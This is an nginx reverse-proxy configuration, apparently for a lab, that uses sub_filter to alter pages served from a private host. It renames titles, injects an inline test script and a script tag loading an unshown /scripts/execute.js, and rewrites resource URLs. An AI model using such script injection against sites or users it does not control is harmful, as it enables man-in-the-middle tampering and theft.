# events {}

# http {
  server {
    listen 443 ssl;
    ssl_certificate /etc/ssl/certs/proxy.crt;
    ssl_certificate_key /etc/ssl/private/proxy.key;
    server_name $proxy_server;

    location / {
      sub_filter <title> '<title>updated-';
      sub_filter <head> '<head><script>console.log("test");</script>';
      sub_filter </head> '<script language="javascript" src="/scripts/execute.js"></script></head>';
      sub_filter 'src="' 'src="https://localhost/';
      proxy_set_header Accept-Encoding "";
      sub_filter_once off;

      proxy_ssl_name 192.168.10.3;
      proxy_ssl_server_name on;
      proxy_set_header Host 192.168.10.3;
      proxy_pass http://192.168.10.3;
    }

    location /scripts/ {
      root /usr/share/nginx/html/;
    }
  }
# }
